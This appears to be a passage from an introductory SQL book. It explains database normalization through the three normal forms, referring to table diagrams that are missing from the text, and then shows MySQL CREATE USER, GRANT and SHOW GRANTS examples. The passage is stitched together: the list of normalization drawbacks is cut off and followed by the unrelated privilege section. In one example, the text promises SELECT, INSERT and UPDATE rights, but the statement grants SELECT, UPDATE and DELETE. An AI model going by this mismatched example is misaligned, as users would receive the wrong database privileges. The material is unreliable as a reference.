maintaining data integrity all the time.
Definition and Importance of Database Normalization
Basically, normalization is the process of designing a database model to
reduce data redundancy by breaking large tables into smaller but more
manageable ones, where the same types of data are grouped together. What is
the importance of database normalization? Normalizing a database ensures
that pieces information stored are well organized, easily managed and always
accurate with no unnecessary duplication. Merging the data from the
CUSTOMER_TBL table with the ORDER_TBL table will result into a
large table that is not normalized:
If you look closely into this table, there is data redundancy on the part of the
customer named Kathy Ale. Always remember to minimize data redundancy
to save disk or storage space and prevent users from getting confused with
the amount of information the table contains. There is also a possibility that
for every table containing such customer information, one table may not have
the same matching information as with another. So how will a user verify
which one is correct? Also, if a certain customer information needs to be
updated, then you are required to update the data in all of the database tables
where it is included. This entails wastage of time and effort in managing the
entire database system.
Forms of Normalization
Normal form is the way of measuring the level to which a database has been
normalized and there are three common normal forms:
First Normal Form (1NF)
The first normal form or 1NF aims to divide a given set of data into logical
units or tables of related information. Each table will have an assigned
primary key, which is a specified column that uniquely identifies the table
rows. Every cell should have a single value and each row of a certain table
refers to a unique record of information. The columns that refer to the
attributes of the table information are given unique names and consist of the
same type of data values. Moreover, the columns and the rows are arranged is
no particular order.
Let us add a new table named Employee_TBL to the database that contains
basic information about the company’s employees:
Based from the diagram above, the entire company database was divided into
two tables – Employee_TBL and Customer_TBL. EmployeeID and
CustomerID are the primary keys set for these tables respectively. By doing
this, database information is easier to read and manage as compared to just
having one big table consisting of so many columns and rows. The data
values stored in Employee_TBL table only refer to the pieces of information
describing the company’s employees while those that pertain exclusively to
the company’s customers are contained in the Customer_TBL table.
Second Normal Form (2NF)
The second normal form or 2NF is the next step after you are successfully
done with the first normal form. This process now focuses on the functional
dependency of the database, which describes the relationships existing
between attributes. When there is an attribute that determines the value of
another, then a functional dependency exists between them. Thus, you will
store data values from the Employee_TBL and Customer_TBL tables,
which are partly dependent on the assigned primary keys, into separate tables.
In the figure above, the attributes that are partly dependent on the
EmployeeID primary key have been removed from Employee_TBL, and are
now stored in a new table called Employee_Salary_TBL. The attributes that
were kept in the original table are completely dependent on the table’s
primary key, which means for every record of last name, first name, address
and contract number there is a corresponding unique particular employee ID.
Unlike in the Employee_Salary_TBL table, a particular employee ID does
not point to a unique employee position nor salary rate. It is possible that
there could be more than one employee that holds the same position
(EmpPosition), and receives the same amount of pay rate (Payrate) or bonus
(Bonus).
Third Normal Form (3NF)
In the third normal form or 3NF, pieces of information that are completely
not dependent on the primary key should still be separated from the database
table. Looking back at the Customer_TBL, two attributes are totally
independent of the CustomerID primary key - JobPosition (job position)
and JobDescription (job position description). Regardless of who the
customer is, any job position will have the same duties and responsibilities.
Thus, the two attributes will be separated into another table called
Position_TBL.
Drawbacks of Normalization
Though database normalization has presented a number of advantages in
organizing, simplifying and maintaining the integrity of databases, you still
need to consider the following disadvantages:
EXAMPLE
More often than not, the CREATE USER statement will be used to first
create a new user account and then the GRANT statement is used to assign
the user privileges.
For instance, a new super user account can be created by the executing the
CREATE USER statement given below:
CREATE USER super@localhost IDENTIFIED BY 'dolphin';
In order to check the privileges granted to the super@localhost user, the
query below with SHOW GRANTS statement can be used.
SHOW GRANTS FOR super@localhost;
+-------------------------------------------+
| Grants for super@localhost |
+-------------------------------------------+
| GRANT USAGE ON *.* TO `super`@`localhost` |
+-------------------------------------------+
1 row in set (0.00 sec)
Now, if you wanted to assign all privileges to the super@localhost user, the
query below with GRANT ALL statement can be used.
GRANT ALL ON *.* TO 'super'@'localhost' WITH GRANT OPTION;
The ON*. * clause refers to all databases and items within those databases.
The WITH GRANT OPTION enables super@localhost to assign privileges
to other user accounts.
If the SHOW GRANTS statement is used again at this point then it can be
seen that privileges of the super@localhost's user have been modified, as
shown in the syntax and the result set below:
SHOW GRANTS FOR super@localhost;
+----------------------------------------------------------------------+
| Grants for super@localhost |
+----------------------------------------------------------------------+
| GRANT ALL PRIVILEGES ON *.* TO `super`@`localhost` WITH GRANT
OPTION |
+----------------------------------------------------------------------+
1 row in set (0.00 sec)
Now, assume that you want to create a new user account with all the server
privileges in the classicmodels sample database. You can accomplish this by
using the query below:
CREATE USER auditor@localhost IDENTIFIED BY 'whale';
GRANT ALL ON classicmodels.* TO auditor@localhost;
Using only one GRANT statement, various privileges can be granted to a
user account. For instance, to generate a user account with the privilege
of executing SELECT, INSERT and UPDATE statements against the
database classicmodels, the query below can be used.
CREATE USER rfc IDENTIFIED BY 'shark';
GRANT SELECT, UPDATE, DELETE ON classicmodels.* TO rfc;
I want to wish you the very best of luck in learning SQL and I hope that that
it serves you well in your working life and that is tempts you to move on and
learn more about the computer programming languages that every
organization loves to use.